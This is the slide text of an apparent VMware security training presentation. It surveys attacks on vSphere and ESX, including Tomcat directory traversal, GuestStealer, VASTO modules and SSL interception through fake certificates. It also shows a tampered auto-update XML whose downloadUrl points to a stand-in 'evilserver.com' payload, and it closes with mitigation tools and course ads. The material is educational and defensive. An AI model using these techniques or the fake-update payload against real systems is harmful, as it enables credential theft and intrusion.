welcome!
DESCRIPTION
WELCOME!. Hacking Uncovered: VMware ® Advanced VMware® Security The Latest Threats and Tools. Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+. Cool Offer!. - PowerPoint PPT PresentationTRANSCRIPT
WELCOME!
Presented by Duane Anderson of VMTraining – CPTS, CEH, CPTE, CDFE, CWSE, CISSO, CVE, CVSE and Security+
Hacking Uncovered: VMware® Advanced VMware® SecurityThe Latest Threats and Tools
Free Drawing for 1 seat in the VMware Advanced Security Class with Firebrand.
Cool Offer!
vSphere Just Another Layer to Attack?Recent Cases involving VMware
What are you in for? Hold On!
Pen Testing Methodology
GueststealerTomCat Zero Day Directory TraversalVASTOMitigation Techniques3rd Party Mitigation Tools
VMware – 80% of the Market Share
Do the Tools used in Pen Testing work with virtualization?
Are there hacks being designed just for VMware?
What is this costing us?
What is Happening today?
The Need is Here!
• CyberCrime and CyberWar Predictions for 2011
• #2 – Cloud Computing and Virtual Machines (VM) will be specifically targeted by cybercriminals and cyber terrorists resulting in VM malware and Cloud downtime and Cloud data theft.
Hackin9 – Issue 01/2011(37)
What are the main security concerns associated with virtualization in general?Segregation of DutiesAccounting/LoggingNew API’s
VMsafevStoragevNetwork
VMsafe Virtual AppliancesPlug-InsShare Resources – can they be attacked?
Memory, CPU, Datastore
Time to Discuss
Virtualization – Just Another Layer to Attack
• vSphere Client• API’s • Plugin’s - VMware
• Update Manager• Guided Consolidation• VMware Converter• Storage vMotion
• Plugin’s - 3rd Party• Back Up Solutions (3rd Party -
Veeam)• RDP - (3rd Party - The RDP plug-
in, by Juxtaposition) • Invoke Plugin
Management
Interfaces
Web Service
ESX and vCenter both use a Web Service• vCenter on by
default – Why?• ESX disabled –
Thank God
Tomcat Web Service• How many
holes have we found here? WOW
Utilizes a Proxy• The is the
same proxy used by hostd.
VMware is using an old version of TomCat that leaves the username
and password in a world readable file!
Fixed by a recent update for vCenter 4.1
TomCat
VMCI
• It provides communication between VMs and trusted endpoints on the host, and from VM to VM. The vmkernel is considered a trusted end-point.
• This interface is implemented as a virtual PCI device, present by default in all VMs created with virtual hardware version 7.
VMCI, or Virtual Machine Communications Interface is an interface designed in the hardware of a VM.
http://pubs.vmware.com/vmci-sdk/VMCI_intro.html
ThreatsPerceivedKnown
RisksProbabilityPotential Impact
Time to Discuss
Secunia Historic AdvisoriesESX 4.xESXi 4.xvCenter Server 4.x
nvd.nist.govOver 40 Vulnerabilities for VMware Products
McAfee ThreatsVMware
ESX Server Heap Buffer OverflowvCenter Update Manager CSSvCenter Update Manager Directory Traversal
Some Vulnerabilities
Chained Exploit Example130 Million Credit Cards Stolen – Gonzalez Indictment• SQL Injection Attacks• SQL Injection Strings• Malware• Root kits• Visiting the stores• Disabling the logs• Using Proxies
Little Known Fact:Occurred on VMware!!!!
This does not change, regardless of the environment being tested.Information GatheringScanningEnumerationPenetration
FailStart Over or tell them great job
SucceedEscalate PrivilegesSteal Data or Leave proof of hackCover TracksLeave Backdoors
Methodology
GoogleNMAP – Since v4.8EttercapCain and AbelMetasploit
Claudio CriscioneVASTO – Virtualization ASsessment
TOolkit
Tools….
Shodan – You have to be kidding me!
Shodan – You have to be kidding me!
We have to find the systems first. Just like any other service, ESX has its own
tells. NMAP – will give you what you need. Lets see this in action!
Scanning for ESX
• Yes you can create your own modules.• We will take a look at VASTO – Virtualization ASsessment Toolkit by Claudio Criscione
Auxiliary Modules
• The purpose of meterpreter scripts are to give end-users an easy interface to write quick scripts that can be run against remote targets after successful exploitation. (Metasploit)
• Meterpreter is an effective tool for creating backdoors.
Meterpreter
How we understand Fake Certificate Injection to work.
ARP Cache Poisoning will allow us to perform a successful SSL crack!
The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One
between the victim and the hacker, the other between the hacker and the real server.
The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.
SSL request
SSL reply(Fake certificate)
SSL request
SSL reply(Real Self Signed Cert)
F&JLMDHGST*KU P)JDGH$FDSD@Cleartext
Copy &
Alter
Stop
ESX Sever
VIC Client Login
Stealing the Password
DECISION TIME!
Password Revealed…
You are still vulnerable even if you use vCenter.
I can offer this:
Once the above password is stolen you can login to the host with the vpxuser and above password.
Screenshots
Presented at SchmooCon 2010
VULNERABLE VERSIONS
• Server• VMware Server 2.x < 2.0.2 build
203138 (Linux)• VMware Server 1.x < 1.0.10 build
203137 (Linux)• ESX/ESXi• ESX 3.5 w/o ESX350-200901401-SG• ESX 3.0.3 w/o ESX303-200812406-BG• ESXi 3.5 w/o ESXe350-200901401-I-SG
• Thanks for the Virtual Machines!GuestStealer
• How Large is your dictionary file?
Dictionary Attack
• Need to know exactly what is running?
Fingerprinting Tool
VASTO – Auxiliary Modules
vSphere Client Communication
Auto Update Process•<patchVersion>3.0.0</patchVersion>•<apiVersion>3.1.0</apiVersion>•<downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl>
Client Server
1
23
4
GET /client/clients.xmlAutoUpdate URL
RetrieveServiceInstance
ServiceInstance
RetrieveServiceStatus
Status
GET /client/clients.xmlAutoupdate URL
Login
The Auto Update Process
• <patchVersion>3.0.0</patchVersion>• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://*/client/
VMware-viclient.exe</downloadUrl>
The Evil Guy
• <patchVersion>10.0.0</patchVersion>
• <apiVersion>3.1.0</apiVersion>• <downloadUrl>https://
evilserver.com/evilpaypoad.exe</downloadUrl>
VASTO VILurker
Change the clients.xml filename
The package will run under the user’s privilege!• Administrator
Anyone?
Provide your nasty trojan package.• Could be combined
with other attacks.
Create a fake web interface so
you look ligit!
This can be done as MiTM or
Rouge Server
You will trigger a “certificate error”
VASTO VILurker
VASTO Autopwn
Autopwn – How easy can it get?
Uses a flaw in the Tomcat Web Server
Transfers the Latest Session File from vCenter using a
Directory Traversal Attack.
Admin rights without knowing a
username or password!
Mitigating These Vulnerabilities
• Vmware• vShield Zones
• 3rd Party• Altor• Reflex• CheckPoint• Astaro Security Gateway• Tripwire• Catbird• HyTrust
Mitigation Tools – Best of the Breed
TrendMicro Deep SecurityTrend Micro Deep Security provides advanced
security for physical, virtual, and cloud servers and virtual desktops.
ModulesAgentless Malware Detection for VMsDeep Packet InspectionIntrusion Detection and PreventionWeb Application and ProtectionApplication ControlBidirectional Stateful FirewallIntegrity MonitoringLog Inspection
Deep Security Architecture
In-depth Look – *Authors PicksCatbird
Catbird TrustZones® policy-based security envelope for virtual infrastructures and the cloud. Enforces protection and measures compliance across virtual clusters and data centers.Catbird virtual security
appliance performs several functions: Hypervisor auditing Virtual network IPS Network segmentation and
access control Vulnerability management Multi-tenant security Reports to management
console
Catbird appliances collect data and enforce policies
Appliances report events to management console
Management console analyses events andcorrelates to compliance framework
Catbird – continuous compliance
1. Course Introduction and Methodology2. Penetration Testing 1013. Primer and Reaffirming our Knowledge4. Security Architecture, vCPU, vMemory5. Routing and the vNetwork6. vStorage – Architecture and Security Implementations7. Hardening the Virtual Machines8. Hardening the Host9. Hardening Virtual Center10. Virtualizing your DMZ11. 3rd Party Mitigation Tools12. Putting it all Together
VMware Advanced Security
1. Course Intro & Methodology 2. Virtualization Overview3. Planning & Installing ESX/ESXi 44. Using Tools to Administer a VMware Environment5. Configuring Networking6. Configuring Storage7. vCenter Server 4 and Licensing8. VM Creation and Configuration & Snapshots9. Security and Permissions10. Server and VM Monitoring11. Advanced ESX and vCenter Management12. Patching and Upgrading ESX/ESXi13. Disaster Recovery and Backup
50 Hours of Training – 6.5 Classes in ONE
vSphere 4.1 Ultimate Bootcamp
Does vSphere really have some major
issues?
Recent Cases involving ESX
Pen Testing Methodology
Web Related issues VASTO Mitigation
techniques
Questions?
Review